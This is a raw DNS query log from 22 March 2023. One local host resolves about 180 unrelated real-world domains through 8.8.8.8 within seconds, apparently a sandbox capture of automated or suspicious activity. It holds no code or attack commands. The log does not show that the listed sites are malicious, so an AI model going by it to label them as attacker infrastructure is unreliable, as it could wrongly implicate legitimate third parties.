Mar 22, 2023 05:44:42.286135912 CET	8.8.8.8	192.168.2.5	0x5d9c	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.302753925 CET	8.8.8.8	192.168.2.5	0xc3e3	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.320673943 CET	8.8.8.8	192.168.2.5	0x9ecf	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.370562077 CET	8.8.8.8	192.168.2.5	0x4376	No error (0)	kumaden.com		49.212.180.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.488706112 CET	8.8.8.8	192.168.2.5	0x5622	No error (0)	orlyhotel.com		172.67.156.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.488706112 CET	8.8.8.8	192.168.2.5	0x5622	No error (0)	orlyhotel.com		104.21.48.207	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.488955975 CET	8.8.8.8	192.168.2.5	0xa3cd	No error (0)	kavram.com		104.21.89.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.488955975 CET	8.8.8.8	192.168.2.5	0xa3cd	No error (0)	kavram.com		172.67.189.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.496525049 CET	8.8.8.8	192.168.2.5	0x71a	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.535424948 CET	8.8.8.8	192.168.2.5	0x163b	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.562864065 CET	8.8.8.8	192.168.2.5	0x7513	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.581350088 CET	8.8.8.8	192.168.2.5	0xfd9c	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.606863976 CET	8.8.8.8	192.168.2.5	0xf617	No error (0)	www.muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.650571108 CET	8.8.8.8	192.168.2.5	0xdd93	No error (0)	diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.658473015 CET	8.8.8.8	192.168.2.5	0x6d87	Server failure (2)	someikan.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.708425045 CET	8.8.8.8	192.168.2.5	0x48d	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.713469982 CET	8.8.8.8	192.168.2.5	0x8562	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.731683969 CET	8.8.8.8	192.168.2.5	0xe848	No error (0)	jnf.at		136.243.147.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.770639896 CET	8.8.8.8	192.168.2.5	0x60ac	No error (0)	nrsi.com		76.223.35.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.815108061 CET	8.8.8.8	192.168.2.5	0xa650	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.817600012 CET	8.8.8.8	192.168.2.5	0xbbeb	No error (0)	sgk.home.pl		89.161.136.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.825037003 CET	8.8.8.8	192.168.2.5	0x3b59	No error (0)	kallman.net		185.76.64.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.826663971 CET	8.8.8.8	192.168.2.5	0xcc06	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.826663971 CET	8.8.8.8	192.168.2.5	0xcc06	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.026113987 CET	8.8.8.8	192.168.2.5	0xe43d	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.035043955 CET	8.8.8.8	192.168.2.5	0xc68a	No error (0)	tcpoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.035043955 CET	8.8.8.8	192.168.2.5	0xc68a	No error (0)	tcpoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.035322905 CET	8.8.8.8	192.168.2.5	0xab38	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.139920950 CET	8.8.8.8	192.168.2.5	0x959e	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.185693026 CET	8.8.8.8	192.168.2.5	0xab25	No error (0)	epc.com.au		103.4.16.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.270047903 CET	8.8.8.8	192.168.2.5	0x4db6	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.270047903 CET	8.8.8.8	192.168.2.5	0x4db6	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.276599884 CET	8.8.8.8	192.168.2.5	0x229b	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.288238049 CET	8.8.8.8	192.168.2.5	0x6bee	No error (0)	sjbmw.com		198.199.101.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.300755978 CET	8.8.8.8	192.168.2.5	0x5575	No error (0)	juso-gr.ch		172.67.163.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.300755978 CET	8.8.8.8	192.168.2.5	0x5575	No error (0)	juso-gr.ch		104.21.50.140	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.340662956 CET	8.8.8.8	192.168.2.5	0x3ade	No error (0)	fogra.com.pl		85.128.55.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.348421097 CET	8.8.8.8	192.168.2.5	0x5c9c	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.348421097 CET	8.8.8.8	192.168.2.5	0x5c9c	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.348421097 CET	8.8.8.8	192.168.2.5	0x5c9c	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.348421097 CET	8.8.8.8	192.168.2.5	0x5c9c	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.353837013 CET	8.8.8.8	192.168.2.5	0x18d0	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.359874010 CET	8.8.8.8	192.168.2.5	0xc980	No error (0)	atb-lit.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.367403030 CET	8.8.8.8	192.168.2.5	0xe204	No error (0)	redgiga.com		104.21.76.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.367403030 CET	8.8.8.8	192.168.2.5	0xe204	No error (0)	redgiga.com		172.67.186.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.380939007 CET	8.8.8.8	192.168.2.5	0x3692	No error (0)	kayoaiba.com		154.213.117.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.412409067 CET	8.8.8.8	192.168.2.5	0x9ec1	No error (0)	aoinko.net		157.7.107.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.485881090 CET	8.8.8.8	192.168.2.5	0xeb2d	No error (0)	sinwal.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.485881090 CET	8.8.8.8	192.168.2.5	0xeb2d	No error (0)	sinwal.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.486515999 CET	8.8.8.8	192.168.2.5	0x3448	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.488408089 CET	8.8.8.8	192.168.2.5	0xfc69	No error (0)	angework.com		219.94.128.87	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.533684969 CET	8.8.8.8	192.168.2.5	0x9527	No error (0)	kewlmail.com		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.566668987 CET	8.8.8.8	192.168.2.5	0xc36e	No error (0)	impexnc.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.575712919 CET	8.8.8.8	192.168.2.5	0x390	No error (0)	willsub.com		69.89.107.122	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.627840042 CET	8.8.8.8	192.168.2.5	0xf37b	No error (0)	vdoherty.com		91.216.241.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.667344093 CET	8.8.8.8	192.168.2.5	0x387a	No error (0)	jsaps.com		49.212.235.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.756853104 CET	8.8.8.8	192.168.2.5	0x75c4	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:43.910114050 CET	8.8.8.8	192.168.2.5	0x114b	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.001806974 CET	8.8.8.8	192.168.2.5	0x55af	No error (0)	snf.it		95.174.22.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.006526947 CET	8.8.8.8	192.168.2.5	0x891c	No error (0)	bible.org		104.20.54.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.006526947 CET	8.8.8.8	192.168.2.5	0x891c	No error (0)	bible.org		104.20.55.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.006526947 CET	8.8.8.8	192.168.2.5	0x891c	No error (0)	bible.org		172.67.33.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.009306908 CET	8.8.8.8	192.168.2.5	0xdd8f	No error (0)	assideum.com		52.219.88.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.010901928 CET	8.8.8.8	192.168.2.5	0x62c2	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.010901928 CET	8.8.8.8	192.168.2.5	0x62c2	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.031619072 CET	8.8.8.8	192.168.2.5	0xb22b	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.105289936 CET	8.8.8.8	192.168.2.5	0x39a8	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.105289936 CET	8.8.8.8	192.168.2.5	0x39a8	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.112406015 CET	8.8.8.8	192.168.2.5	0x5c03	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.117573977 CET	8.8.8.8	192.168.2.5	0x9d95	No error (0)	leapc.com		35.231.13.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.145483971 CET	8.8.8.8	192.168.2.5	0xd842	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.173616886 CET	8.8.8.8	192.168.2.5	0x5c7e	No error (0)	s5w.com		192.99.226.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.177069902 CET	8.8.8.8	192.168.2.5	0xeb18	No error (0)	pers.com		192.124.249.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.200460911 CET	8.8.8.8	192.168.2.5	0x3acc	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.322355986 CET	8.8.8.8	192.168.2.5	0xbaf2	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.322355986 CET	8.8.8.8	192.168.2.5	0xbaf2	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.333268881 CET	8.8.8.8	192.168.2.5	0xd9c4	No error (0)	arowines.com		104.164.117.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.358524084 CET	8.8.8.8	192.168.2.5	0xf3a9	No error (0)	univi.it		18.197.121.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.382426023 CET	8.8.8.8	192.168.2.5	0x70e9	No error (0)	insia.com		82.208.6.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.398339987 CET	8.8.8.8	192.168.2.5	0x38ed	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.433336973 CET	8.8.8.8	192.168.2.5	0xffa6	No error (0)	nts-web.net		49.212.235.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.441771030 CET	8.8.8.8	192.168.2.5	0xb083	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.448148966 CET	8.8.8.8	192.168.2.5	0xc6f3	No error (0)	sigtoa.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.448148966 CET	8.8.8.8	192.168.2.5	0xc6f3	No error (0)	sigtoa.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.449775934 CET	8.8.8.8	192.168.2.5	0x619f	No error (0)	metaforacom.com		185.42.105.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.457658052 CET	8.8.8.8	192.168.2.5	0x72f3	No error (0)	ramkome.com		62.75.216.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.483434916 CET	8.8.8.8	192.168.2.5	0x982f	No error (0)	pcoyuncu.com		213.142.131.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.508280039 CET	8.8.8.8	192.168.2.5	0x1983	No error (0)	strazynski.pl		85.128.196.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.519370079 CET	8.8.8.8	192.168.2.5	0x4ece	No error (0)	ncn.de		46.30.60.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.545213938 CET	8.8.8.8	192.168.2.5	0xa5c0	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.550559998 CET	8.8.8.8	192.168.2.5	0x6a28	No error (0)	dhh.la.gov		52.200.51.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.552076101 CET	8.8.8.8	192.168.2.5	0x25d4	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.554714918 CET	8.8.8.8	192.168.2.5	0x4498	No error (0)	infotech.pl		79.96.32.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.560751915 CET	8.8.8.8	192.168.2.5	0x6ca3	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.584114075 CET	8.8.8.8	192.168.2.5	0x5ec1	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.665468931 CET	8.8.8.8	192.168.2.5	0xf655	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.684700966 CET	8.8.8.8	192.168.2.5	0x64b3	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.710367918 CET	8.8.8.8	192.168.2.5	0xe98b	No error (0)	vivastay.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:44.710367918 CET	8.8.8.8	192.168.2.5	0xe98b	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:44.710367918 CET	8.8.8.8	192.168.2.5	0xe98b	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.710367918 CET	8.8.8.8	192.168.2.5	0xe98b	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.786737919 CET	8.8.8.8	192.168.2.5	0x11fd	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.795742989 CET	8.8.8.8	192.168.2.5	0xe00a	No error (0)	stopllc.com		162.241.233.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.799163103 CET	8.8.8.8	192.168.2.5	0x712d	No error (0)	xult.org		65.52.128.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.800354004 CET	8.8.8.8	192.168.2.5	0x66fa	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.873256922 CET	8.8.8.8	192.168.2.5	0x4bfb	No error (0)	alexpope.biz		76.74.184.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.891814947 CET	8.8.8.8	192.168.2.5	0xac21	No error (0)	smitko.net		31.15.12.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.903321028 CET	8.8.8.8	192.168.2.5	0xf866	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.903321028 CET	8.8.8.8	192.168.2.5	0xf866	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.903321028 CET	8.8.8.8	192.168.2.5	0xf866	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.909643888 CET	8.8.8.8	192.168.2.5	0x7c8e	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.922103882 CET	8.8.8.8	192.168.2.5	0xb4de	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.958422899 CET	8.8.8.8	192.168.2.5	0xa237	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.958422899 CET	8.8.8.8	192.168.2.5	0xa237	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:44.994929075 CET	8.8.8.8	192.168.2.5	0x71a6	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.028513908 CET	8.8.8.8	192.168.2.5	0x30f5	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.079011917 CET	8.8.8.8	192.168.2.5	0x6cae	No error (0)	bidroll.com		13.56.33.8	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.104772091 CET	8.8.8.8	192.168.2.5	0xf5a9	No error (0)	oozkranj.com		212.44.102.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.106137991 CET	8.8.8.8	192.168.2.5	0xed3e	No error (0)	roewer.de		45.142.176.225	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.111248970 CET	8.8.8.8	192.168.2.5	0x2394	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.111248970 CET	8.8.8.8	192.168.2.5	0x2394	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.134735107 CET	8.8.8.8	192.168.2.5	0xba9	No error (0)	e-kami.net		202.172.28.89	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.160687923 CET	8.8.8.8	192.168.2.5	0xad9c	No error (0)	assideum.com		52.219.100.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.161768913 CET	8.8.8.8	192.168.2.5	0xd27e	No error (0)	smitko.net		31.15.12.103	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.181303024 CET	8.8.8.8	192.168.2.5	0xca9a	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.196413994 CET	8.8.8.8	192.168.2.5	0xdd5f	No error (0)	webavant.com		148.72.176.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.222945929 CET	8.8.8.8	192.168.2.5	0x9e72	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.239048958 CET	8.8.8.8	192.168.2.5	0xca9a	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.274435997 CET	8.8.8.8	192.168.2.5	0xc118	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.275197029 CET	8.8.8.8	192.168.2.5	0x2829	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.342782021 CET	8.8.8.8	192.168.2.5	0xca11	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.375629902 CET	8.8.8.8	192.168.2.5	0x72a4	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.375629902 CET	8.8.8.8	192.168.2.5	0x72a4	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.378565073 CET	8.8.8.8	192.168.2.5	0x34ca	No error (0)	shanks.co.uk		217.19.254.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.380074978 CET	8.8.8.8	192.168.2.5	0x897f	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.388628960 CET	8.8.8.8	192.168.2.5	0x4619	No error (0)	oozkranj.com		212.44.102.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.392929077 CET	8.8.8.8	192.168.2.5	0x6bbf	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.519988060 CET	8.8.8.8	192.168.2.5	0x2db7	Server failure (2)	ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.541990042 CET	8.8.8.8	192.168.2.5	0x984	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.647726059 CET	8.8.8.8	192.168.2.5	0x453f	No error (0)	dwid.de		87.230.93.218	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.665863991 CET	8.8.8.8	192.168.2.5	0xdeff	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.668826103 CET	8.8.8.8	192.168.2.5	0x9418	No error (0)	zupraha.cz		77.78.104.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.707948923 CET	8.8.8.8	192.168.2.5	0x50e3	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.765027046 CET	8.8.8.8	192.168.2.5	0x7f5c	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.777230978 CET	8.8.8.8	192.168.2.5	0x54e8	No error (0)	aoinko.net		157.7.107.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.780854940 CET	8.8.8.8	192.168.2.5	0xad62	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.799700022 CET	8.8.8.8	192.168.2.5	0x8af8	No error (0)	zemarmot.net		164.132.175.106	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.880924940 CET	8.8.8.8	192.168.2.5	0x17b4	No error (0)	dspears.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:45.880924940 CET	8.8.8.8	192.168.2.5	0x17b4	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:45.880924940 CET	8.8.8.8	192.168.2.5	0x17b4	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.880924940 CET	8.8.8.8	192.168.2.5	0x17b4	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.890234947 CET	8.8.8.8	192.168.2.5	0xf25	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.890234947 CET	8.8.8.8	192.168.2.5	0xf25	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.914791107 CET	8.8.8.8	192.168.2.5	0x6710	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.975151062 CET	8.8.8.8	192.168.2.5	0xce86	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.986093044 CET	8.8.8.8	192.168.2.5	0x4867	No error (0)	mcseurope.nl		46.19.218.80	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.069591999 CET	8.8.8.8	192.168.2.5	0x67b2	No error (0)	amerifor.com		64.18.191.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.073635101 CET	8.8.8.8	192.168.2.5	0xc560	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.097332001 CET	8.8.8.8	192.168.2.5	0x4c34	No error (0)	paraski.org		94.130.164.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.138407946 CET	8.8.8.8	192.168.2.5	0x1d80	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.138551950 CET	8.8.8.8	192.168.2.5	0x595d	No error (0)	redgiga.com		104.21.76.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.138551950 CET	8.8.8.8	192.168.2.5	0x595d	No error (0)	redgiga.com		172.67.186.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.198954105 CET	8.8.8.8	192.168.2.5	0x1cc8	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.327353954 CET	8.8.8.8	192.168.2.5	0xad26	No error (0)	kustnara.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.327353954 CET	8.8.8.8	192.168.2.5	0xad26	No error (0)	kustnara.com		76.223.27.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.327353954 CET	8.8.8.8	192.168.2.5	0xad26	No error (0)	kustnara.com		13.248.155.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.327353954 CET	8.8.8.8	192.168.2.5	0xad26	No error (0)	kustnara.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.348463058 CET	8.8.8.8	192.168.2.5	0xda4d	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.355372906 CET	8.8.8.8	192.168.2.5	0xbecd	No error (0)	wnit.org		38.111.255.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.370055914 CET	8.8.8.8	192.168.2.5	0x3476	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.452076912 CET	8.8.8.8	192.168.2.5	0x2b36	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.452076912 CET	8.8.8.8	192.168.2.5	0x2b36	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.456202984 CET	8.8.8.8	192.168.2.5	0x2667	No error (0)	gujarat.com		172.67.145.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.456202984 CET	8.8.8.8	192.168.2.5	0x2667	No error (0)	gujarat.com		104.21.73.143	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.466651917 CET	8.8.8.8	192.168.2.5	0xa58	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.525264978 CET	8.8.8.8	192.168.2.5	0x732	No error (0)	pleszew.policja.gov.pl		91.229.22.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.529644012 CET	8.8.8.8	192.168.2.5	0xdf20	No error (0)	bd-style.com		107.165.223.27	A (IP address)	IN (0x0001)	false
